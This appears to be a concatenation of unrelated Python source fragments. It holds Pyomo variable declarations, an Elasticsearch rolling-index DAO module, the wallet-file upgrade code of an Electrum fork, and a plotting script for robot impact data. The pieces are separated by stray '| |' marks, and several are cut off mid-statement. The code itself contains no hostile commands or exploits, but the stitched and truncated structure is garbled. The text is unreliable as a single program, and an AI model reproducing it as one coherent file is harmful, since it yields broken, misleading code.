m.x3680 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3681 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3682 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3683 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3684 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3685 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3686 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3687 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3688 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3689 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3690 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3691 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3692 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3693 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3694 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3695 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3696 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3697 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3698 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3699 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3700 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3701 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3702 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3703 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3704 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3705 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3706 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3707 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3708 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3709 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3710 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3711 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3712 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3713 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3714 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3715 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3716 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3717 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3718 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3719 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3720 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3721 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3722 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3723 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3724 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3725 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3726 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3727 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3728 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3729 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3730 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3731 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3732 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3733 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3734 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3735 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3736 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3737 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3738 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3739 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3740 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3741 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3742 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3743 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3744 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3745 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3746 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3747 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3748 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3749 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3750 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3751 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3752 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3753 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3754 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3755 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3756 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3757 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3758 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3759 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3760 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3761 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3762 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3763 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3764 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3765 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3766 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3767 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3768 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3769 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3770 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3771 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3772 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3773 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3774 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3775 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3776 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3777 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3778 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3779 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3780 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3781 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3782 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3783 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3784 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3785 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3786 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3787 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3788 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3789 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3790 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3791 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3792 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3793 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3794 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3795 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3796 | |
import esprit
from esprit import mappings
from octopus.core import app
import json as jsonlib
from datetime import datetime
import dateutil.relativedelta as relativedelta
import os, threading
from octopus.lib import plugin
from octopus.modules.es.initialise import put_mappings, put_example
class ESInstanceDAO(esprit.dao.DAO):
def __init__(self, type=None, raw=None, *args, **kwargs):
self._conn = esprit.raw.Connection(app.config.get('ELASTIC_SEARCH_HOST'), app.config.get('ELASTIC_SEARCH_INDEX'))
self._es_version = app.config.get("ELASTIC_SEARCH_VERSION")
self._type = type if type is not None else "index"
super(ESInstanceDAO, self).__init__(raw=raw)
def save(self, **kwargs):
self.prep()
super(ESInstanceDAO, self).save(**kwargs)
def json(self):
return jsonlib.dumps(self.data)
def mapping(self):
return {
self._type : {
self._type : app.config.get("ELASTIC_SEARCH_DEFAULT_MAPPING")
}
}
def _get_connection(self):
return self._conn
def _get_write_type(self):
return self._type
def _get_read_types(self):
return [self._type]
############################################
# subclasses should implement these methods if they want them
def prep(self):
pass
class ESDAO(esprit.dao.DomainObject):
__type__ = 'index'
__conn__ = esprit.raw.Connection(app.config.get('ELASTIC_SEARCH_HOST'), app.config.get('ELASTIC_SEARCH_INDEX'))
__es_version__ = app.config.get("ELASTIC_SEARCH_VERSION")
def __init__(self, *args, **kwargs):
super(ESDAO, self).__init__(*args, **kwargs)
#####################################################
## overrides on Domain Object
@classmethod
def delete_by_query(cls, query, conn=None, es_version="0.90.13", type=None):
esv = cls.__es_version__
if esv is None:
esv = es_version
super(ESDAO, cls).delete_by_query(query, conn=conn, es_version=esv, type=type)
def save(self, **kwargs):
self.prep()
super(ESDAO, self).save(**kwargs)
######################################################
## Octopus specific functions
@classmethod
def mappings(cls):
return {
cls.__type__ : {
cls.__type__ : app.config.get("ELASTIC_SEARCH_DEFAULT_MAPPING")
}
}
@classmethod
def example(cls):
return cls()
@classmethod
def self_init(cls, *args, **kwargs):
pass
def json(self):
return jsonlib.dumps(self.data)
def prep(self):
pass
class RollingTypeESDAO(ESDAO):
# should the dynamic type be checked for existance, and initialised
# with a mapping or an example document
__init_dynamic_type__ = False
# if initialising the dynamic type, should it use mappings()
__init_by_mapping__ = False
# if initialising the dynamic type, should it use example()
__init_by_example__ = False
# the order in which the DAO should look for an index type to query
__read_preference__ = ["next", "curr", "prev"]
# create a lock for this DAO to use so that the modifications to the files can
# be synchronised
_lock = threading.RLock()
@classmethod
def _mint_next_type(cls):
return cls.__type__ + datetime.utcnow().strftime("%Y%m%d%H%M%S")
@classmethod
def _roll_dir(cls):
return os.path.join(app.config.get("ESDAO_ROLLING_DIR"), cls.__type__)
# FIXME: these methods are not thread-safe. We need to migrate to ES's index alias
# feature instead
@classmethod
def _get_cfg(cls, pos):
# return app.config.get("ESDAO_ROLLING_{x}_{y}".format(x=pos.upper(), y=cls.__type__.upper()))
return None
@classmethod
def _set_cfg(cls, pos, val):
# app.config["ESDAO_ROLLING_{x}_{y}".format(x=pos.upper(), y=cls.__type__.upper())] = val
pass
@classmethod
def _get_file(cls, pos):
dir = cls._roll_dir()
f = os.path.join(dir, pos)
if os.path.exists(f) and os.path.isfile(f):
with open(f) as o:
return o.read()
return None
@classmethod
def _set_file(cls, pos, val):
if val is None:
cls._drop_file(pos)
return
dir = cls._roll_dir()
f = os.path.join(dir, pos)
with open(f, "wb") as o:
o.write(val)
@classmethod
def _drop_file(cls, pos):
dir = cls._roll_dir()
f = os.path.join(dir, pos)
if os.path.exists(f) and os.path.isfile(f):
os.remove(f)
@classmethod
def _init_type(cls, tname):
# there are two ways this might be initialised - by mapping or by example
# 1. by mapping
if cls.__init_by_mapping__:
mps = cls.mappings()
put_mappings({tname : {tname : mps[cls.__type__][cls.__type__]}})
# 2. by example
elif cls.__init_by_example__:
ex = cls.example()
put_example(tname, ex)
@classmethod
def _straighten_type(cls, pos, conn=None):
if conn is None:
conn = cls.__conn__
# get what we think the current index is for this position
i = cls._get_file(pos)
# if there's no index at that position, just check the cfg is reset correctly
if i is None:
cls._set_cfg(pos, None)
return
esv = app.config.get("ELASTIC_SEARCH_VERSION")
# if there is an index named, we need to check it exists
if esprit.raw.type_exists(conn, i, es_version=esv):
# if the type does exist, then we just need to check the config is reset correctly
cls._set_cfg(pos, i)
else:
# there is no type corresponding to the file, so reset the config and the file
cls._drop_file(pos)
cls._set_cfg(pos, None)
@classmethod
def rolling_status(cls):
pc = cls._get_cfg("prev")
pf = cls._get_file("prev")
cc = cls._get_cfg("curr")
cf = cls._get_file("curr")
nc = cls._get_cfg("next")
nf = cls._get_file("next")
s = {
"prev" : {"cfg" : pc, "file" : pf},
"curr" : {"cfg" : cc, "file" : cf},
"next" : {"cfg" : nc, "file" : nf}
}
return s
@classmethod
def rolling_refresh(cls):
cls._set_cfg("prev", cls._get_file("prev"))
cls._set_cfg("curr", cls._get_file("curr"))
cls._set_cfg("next", cls._get_file("next"))
@classmethod
def drop_next(cls, conn=None):
with cls._lock:
if conn is None:
conn = cls.__conn__
# get the canonical name for the index
n = cls._get_file("next")
if n is None:
return
# drop the file, the config and the index type in that order
cls._drop_file("next")
cls._set_cfg("next", None)
esprit.raw.delete(conn, n)
@classmethod
def self_init(cls, *args, **kwargs):
# determine if we've been given a connection or to use the default
conn = kwargs.get("conn")
if conn is None:
conn = cls.__conn__
# first determine if we've been passed any arguments for initialisation
rollover = True
tname = kwargs.get("type_name")
write_to = kwargs.get("write_to", "curr")
rollover = tname is not None
esv = app.config.get("ELASTIC_SEARCH_VERSION")
# FIXME: put the lock in here
with cls._lock:
# now determine the route we're going to go down
if rollover:
# check whether the type to write already exists
if not esprit.raw.type_exists(conn, tname, es_version=esv):
cls._init_type(tname)
# now we know the index exists, we can write the file and the
# config
cls._set_file(write_to, tname)
cls._set_cfg(write_to, tname)
else:
# this is the raw application init route, and it needs to make sure that all the
# indices, files and config line up
# first ensure that the current index is set
curr = cls._get_file("curr")
if curr is None:
# if there is no current index, mint a type name for it, then initialise it
curr = cls._mint_next_type()
cls._init_type(curr)
else:
# check that the index referenced exists (it should, as straighten_type above should deal with that
if not esprit.raw.type_exists(conn, curr, es_version=esv):
# if it does not, create the one referenced in the file
cls._init_type(curr)
# synchronise the file and config
cls._set_file("curr", curr)
cls._set_cfg("curr", curr)
# finish by ensuring that the other file pointers and the index are in sync
cls._straighten_type("prev")
cls._straighten_type("next")
###############################################
"""
dir = cls._roll_dir()
f = os.path.join(dir, write_to)
# since file reading/writing is going on, we need to synchronise access to this bit
with cls._lock:
# we only want to write on initialise if we have not already initialised this
# index type. So, if the file exists (e.g. "curr"), then no need to init
if write:
if os.path.exists(f):
return
# if we get to here either the write_to needs to be initialised, or we haven't
# been asked to "write" the index type we're initialising
# there are two ways this might be initialised - by mapping or by example
# 1. by mapping
if cls.__init_by_mapping__:
mps = cls.mappings()
put_mappings({tname : {tname : mps[cls.__type__][cls.__type__]}})
# 2. by example
elif cls.__init_by_example__:
ex = cls.example()
put_example(tname, ex)
# finally, write the type name to the file
if write:
if not os.path.exists(dir):
os.mkdir(dir)
with open(f, "wb") as o:
o.write(tname)
"""
@classmethod
def publish(cls, conn=None):
# synchronise access
with cls._lock:
if conn is None:
conn = cls.__conn__
prev = cls._get_file("prev")
curr = cls._get_file("curr")
next = cls._get_file("next")
if next is None:
return
# write current to previous
cls._set_file("prev", curr)
# write next to current
cls._set_file("curr", next)
# get rid of the next file
cls._drop_file("next")
# refresh the configuration
cls.rolling_refresh()
# drop the previous index, if it existed
if prev is not None:
esprit.raw.delete(conn, prev)
@classmethod
def rollback(cls, conn=None):
# synchronise access
with cls._lock:
if conn is None:
conn = cls.__conn__
prev = cls._get_file("prev")
curr = cls._get_file("curr")
next = cls._get_file("next")
# only continue if prev exists
if prev is None:
return
# write current to next
cls._set_file("next", curr)
# write previous to current
cls._set_file("curr", prev)
# get rid of the previous file
cls._drop_file("prev")
# refresh the configuration
cls.rolling_refresh()
# delete the old next index type
if next is not None:
esprit.raw.delete(conn, next)
@classmethod
def dynamic_read_types(cls):
for pref in cls.__read_preference__:
# first look to see if it is set in the config
t = cls._get_cfg(pref)
if t is not None:
return t
# if not next check to see if there's a file
t = cls._get_file(pref)
if t is not None:
cls._set_cfg(pref, t)
return t
# if we don't get anything, return the base type
return cls.__type__
@classmethod
def dynamic_write_type(cls):
# look to see if the next index is already set, in which case we
# can return
next = cls._get_cfg("next")
if next is | |
<reponame>AXErunners/electrum-axe
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 <NAME>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import ast
import json
import copy
import threading
import time
from collections import defaultdict
from typing import Dict, Optional
from . import util, bitcoin
from .util import profiler, WalletFileException, multisig_type, TxMinedInfo
from .keystore import bip44_derivation
from .transaction import Transaction
from .logging import Logger
# seed_version is now used for the version of the wallet file
OLD_SEED_VERSION = 4 # electrum versions < 2.0
NEW_SEED_VERSION = 11 # electrum versions >= 2.0
FINAL_SEED_VERSION = 18 # electrum >= 2.7 will set this to prevent
# old versions from overwriting new format
class JsonDBJsonEncoder(util.MyEncoder):
def default(self, obj):
if isinstance(obj, Transaction):
return str(obj)
return super().default(obj)
class JsonDB(Logger):
def __init__(self, raw, *, manual_upgrades):
Logger.__init__(self)
self.lock = threading.RLock()
self.data = {}
self._modified = False
self.manual_upgrades = manual_upgrades
self.upgrade_done = False
self._called_after_upgrade_tasks = False
if raw: # loading existing db
self.load_data(raw)
else: # creating new db
self.put('seed_version', FINAL_SEED_VERSION)
self._after_upgrade_tasks()
self._addr_to_addr_index = {} # address -> (is_change, index)
self._ps_ks_addr_to_addr_index = {} # address -> (is_change, index)
def set_modified(self, b):
with self.lock:
self._modified = b
def modified(self):
return self._modified
def modifier(func):
def wrapper(self, *args, **kwargs):
with self.lock:
self._modified = True
return func(self, *args, **kwargs)
return wrapper
def locked(func):
def wrapper(self, *args, **kwargs):
with self.lock:
return func(self, *args, **kwargs)
return wrapper
@locked
def get(self, key, default=None):
v = self.data.get(key)
if v is None:
v = default
else:
v = copy.deepcopy(v)
return v
@modifier
def put(self, key, value):
try:
json.dumps(key, cls=JsonDBJsonEncoder)
json.dumps(value, cls=JsonDBJsonEncoder)
except:
self.logger.info(f"json error: cannot save {repr(key)} ({repr(value)})")
return False
if value is not None:
if self.data.get(key) != value:
self.data[key] = copy.deepcopy(value)
return True
elif key in self.data:
self.data.pop(key)
return True
return False
def commit(self):
pass
@locked
def dump(self):
return json.dumps(self.data, indent=4, sort_keys=True, cls=JsonDBJsonEncoder)
def load_data(self, s):
try:
self.data = json.loads(s)
except:
try:
d = ast.literal_eval(s)
labels = d.get('labels', {})
except Exception as e:
raise IOError("Cannot read wallet file")
self.data = {}
for key, value in d.items():
try:
json.dumps(key)
json.dumps(value)
except:
self.logger.info(f'Failed to convert label to json format: {key}')
continue
self.data[key] = value
if not isinstance(self.data, dict):
raise WalletFileException("Malformed wallet file (not dict)")
if not self.manual_upgrades and self.requires_split():
raise WalletFileException("This wallet has multiple accounts and must be split")
if not self.requires_upgrade():
self._after_upgrade_tasks()
elif not self.manual_upgrades:
self.upgrade()
def requires_split(self):
d = self.get('accounts', {})
return len(d) > 1
def split_accounts(self):
result = []
# backward compatibility with old wallets
d = self.get('accounts', {})
if len(d) < 2:
return
wallet_type = self.get('wallet_type')
if wallet_type == 'old':
assert len(d) == 2
data1 = copy.deepcopy(self.data)
data1['accounts'] = {'0': d['0']}
data1['suffix'] = 'deterministic'
data2 = copy.deepcopy(self.data)
data2['accounts'] = {'/x': d['/x']}
data2['seed'] = None
data2['seed_version'] = None
data2['master_public_key'] = None
data2['wallet_type'] = 'imported'
data2['suffix'] = 'imported'
result = [data1, data2]
elif wallet_type in ['bip44', 'trezor', 'keepkey', 'ledger', 'btchip',
'digitalbitbox', 'safe_t', 'hideez']:
mpk = self.get('master_public_keys')
for k in d.keys():
i = int(k)
x = d[k]
if x.get("pending"):
continue
xpub = mpk["x/%d'"%i]
new_data = copy.deepcopy(self.data)
# save account, derivation and xpub at index 0
new_data['accounts'] = {'0': x}
new_data['master_public_keys'] = {"x/0'": xpub}
new_data['derivation'] = bip44_derivation(k)
new_data['suffix'] = k
result.append(new_data)
else:
raise WalletFileException("This wallet has multiple accounts and must be split")
return result
def requires_upgrade(self):
return self.get_seed_version() < FINAL_SEED_VERSION
@profiler
def upgrade(self):
self.logger.info('upgrading wallet format')
if self._called_after_upgrade_tasks:
# we need strict ordering between upgrade() and after_upgrade_tasks()
raise Exception("'after_upgrade_tasks' must NOT be called before 'upgrade'")
self._convert_imported()
self._convert_wallet_type()
self._convert_account()
self._convert_version_13_b()
self._convert_version_14()
self._convert_version_15()
self._convert_version_16()
self._convert_version_17()
self._convert_version_18()
self.put('seed_version', FINAL_SEED_VERSION) # just to be sure
self.upgrade_done = True
self._after_upgrade_tasks()
def _after_upgrade_tasks(self):
self._called_after_upgrade_tasks = True
self._load_transactions()
def _convert_wallet_type(self):
if not self._is_upgrade_method_needed(0, 13):
return
wallet_type = self.get('wallet_type')
if wallet_type == 'btchip': wallet_type = 'ledger'
if self.get('keystore') or self.get('x1/') or wallet_type=='imported':
return False
assert not self.requires_split()
seed_version = self.get_seed_version()
seed = self.get('seed')
xpubs = self.get('master_public_keys')
xprvs = self.get('master_private_keys', {})
mpk = self.get('master_public_key')
keypairs = self.get('keypairs')
key_type = self.get('key_type')
if seed_version == OLD_SEED_VERSION or wallet_type == 'old':
d = {
'type': 'old',
'seed': seed,
'mpk': mpk,
}
self.put('wallet_type', 'standard')
self.put('keystore', d)
elif key_type == 'imported':
d = {
'type': 'imported',
'keypairs': keypairs,
}
self.put('wallet_type', 'standard')
self.put('keystore', d)
elif wallet_type in ['xpub', 'standard']:
xpub = xpubs["x/"]
xprv = xprvs.get("x/")
d = {
'type': 'bip32',
'xpub': xpub,
'xprv': xprv,
'seed': seed,
}
self.put('wallet_type', 'standard')
self.put('keystore', d)
elif wallet_type in ['bip44']:
xpub = xpubs["x/0'"]
xprv = xprvs.get("x/0'")
d = {
'type': 'bip32',
'xpub': xpub,
'xprv': xprv,
}
self.put('wallet_type', 'standard')
self.put('keystore', d)
elif wallet_type in ['trezor', 'keepkey', 'ledger', 'digitalbitbox',
'safe_t', 'hideez']:
xpub = xpubs["x/0'"]
derivation = self.get('derivation', bip44_derivation(0))
d = {
'type': 'hardware',
'hw_type': wallet_type,
'xpub': xpub,
'derivation': derivation,
}
self.put('wallet_type', 'standard')
self.put('keystore', d)
elif multisig_type(wallet_type):
for key in xpubs.keys():
d = {
'type': 'bip32',
'xpub': xpubs[key],
'xprv': xprvs.get(key),
}
if key == 'x1/' and seed:
d['seed'] = seed
self.put(key, d)
else:
raise WalletFileException('Unable to tell wallet type. Is this even a wallet file?')
# remove junk
self.put('master_public_key', None)
self.put('master_public_keys', None)
self.put('master_private_keys', None)
self.put('derivation', None)
self.put('seed', None)
self.put('keypairs', None)
self.put('key_type', None)
def _convert_version_13_b(self):
# version 13 is ambiguous, and has an earlier and a later structure
if not self._is_upgrade_method_needed(0, 13):
return
if self.get('wallet_type') == 'standard':
if self.get('keystore').get('type') == 'imported':
pubkeys = self.get('keystore').get('keypairs').keys()
d = {'change': []}
receiving_addresses = []
for pubkey in pubkeys:
addr = bitcoin.pubkey_to_address('p2pkh', pubkey)
receiving_addresses.append(addr)
d['receiving'] = receiving_addresses
self.put('addresses', d)
self.put('pubkeys', None)
self.put('seed_version', 13)
def _convert_version_14(self):
# convert imported wallets for 3.0
if not self._is_upgrade_method_needed(13, 13):
return
if self.get('wallet_type') =='imported':
addresses = self.get('addresses')
if type(addresses) is list:
addresses = dict([(x, None) for x in addresses])
self.put('addresses', addresses)
elif self.get('wallet_type') == 'standard':
if self.get('keystore').get('type')=='imported':
addresses = set(self.get('addresses').get('receiving'))
pubkeys = self.get('keystore').get('keypairs').keys()
assert len(addresses) == len(pubkeys)
d = {}
for pubkey in pubkeys:
addr = bitcoin.pubkey_to_address('p2pkh', pubkey)
assert addr in addresses
d[addr] = {
'pubkey': pubkey,
'redeem_script': None,
'type': 'p2pkh'
}
self.put('addresses', d)
self.put('pubkeys', None)
self.put('wallet_type', 'imported')
self.put('seed_version', 14)
def _convert_version_15(self):
if not self._is_upgrade_method_needed(14, 14):
return
self.put('seed_version', 15)
def _convert_version_16(self):
# fixes issue #3193 for Imported_Wallets with addresses
# also, previous versions allowed importing any garbage as an address
# which we now try to remove, see pr #3191
if not self._is_upgrade_method_needed(15, 15):
return
def remove_address(addr):
def remove_from_dict(dict_name):
d = self.get(dict_name, None)
if d is not None:
d.pop(addr, None)
self.put(dict_name, d)
def remove_from_list(list_name):
lst = self.get(list_name, None)
if lst is not None:
s = set(lst)
s -= {addr}
self.put(list_name, list(s))
# note: we don't remove 'addr' from self.get('addresses')
remove_from_dict('addr_history')
remove_from_dict('labels')
remove_from_dict('payment_requests')
remove_from_list('frozen_addresses')
if self.get('wallet_type') == 'imported':
addresses = self.get('addresses')
assert isinstance(addresses, dict)
addresses_new = dict()
for address, details in addresses.items():
if not bitcoin.is_address(address):
remove_address(address)
continue
if details is None:
addresses_new[address] = {}
else:
addresses_new[address] = details
self.put('addresses', addresses_new)
self.put('seed_version', 16)
def _convert_version_17(self):
# delete pruned_txo; construct spent_outpoints
if not self._is_upgrade_method_needed(16, 16):
return
self.put('pruned_txo', None)
transactions = self.get('transactions', {}) # txid -> raw_tx
spent_outpoints = defaultdict(dict)
for txid, raw_tx in transactions.items():
tx = Transaction(raw_tx)
for txin in tx.inputs():
if txin['type'] == 'coinbase':
continue
prevout_hash = txin['prevout_hash']
prevout_n = txin['prevout_n']
spent_outpoints[prevout_hash][str(prevout_n)] = txid
self.put('spent_outpoints', spent_outpoints)
self.put('seed_version', 17)
def _convert_version_18(self):
# delete verified_tx3 as its structure changed
if | |
# Copyright 2018-2019 CNRS-UM LIRMM
#
# \author <NAME>
#
#
#
# pyQpController is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 3 of the License,
# or (at your option) any later version.
#
# pyQpController is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser
# General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with pyQpController. If not, see
# <http://www.gnu.org/licenses/>.
import sys
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from matplotlib.ticker import FormatStrFormatter
from matplotlib.font_manager import FontProperties
mpl.rcParams['ps.useafm'] = True
mpl.rcParams['pdf.use14corefonts'] = True
mpl.rcParams['text.usetex'] = True
# from matplotlib import colors as mcolors
# colors = dict(mcolors.BASE_COLORS, **mcolors.CSS4_COLORS)
if __name__ =="__main__":
fileName = sys.argv[1]
loaded = np.load(fileName)
#loaded = np.load("../log/data/jointVelocityJump-data_Jan_31_2019_16-09-14.npz")
#loaded = np.load("../log/data/data_Jan_31_2019_18-50-43.npz")
time = loaded['time']
impact_time_1 = [0.24, 0.245] # Generic QP impact case
# impact_time_1 = [0.815, 0.825]
# impact_time_1 = [0.80, 0.815]
#impact_time_1 = [0.795, 0.805]
impact_time_2 = [0.485, 0.495]
impact_time_3 = [0.72, 0.73]
impact_time_4 = [0.99, 1.0]
font = {'family' : 'normal',
'weight' : 'bold',
'size' : 15}
fontP = FontProperties()
fontP.set_size('small')
dq = loaded['dq']
tau = loaded['tau']
ee_v = loaded['ee_v']
ee_f = loaded['ee_f']
#f_QP = loaded['f_QP']
length = len(time)
f_desired = np.ones((length ,1))*57
predict_tauUpper = loaded['predict_tauUpper']
predict_tauLower = loaded['predict_tauLower']
predict_impulseTau = loaded['predict_impulseTau']
impulseTau = loaded['impulseTau']
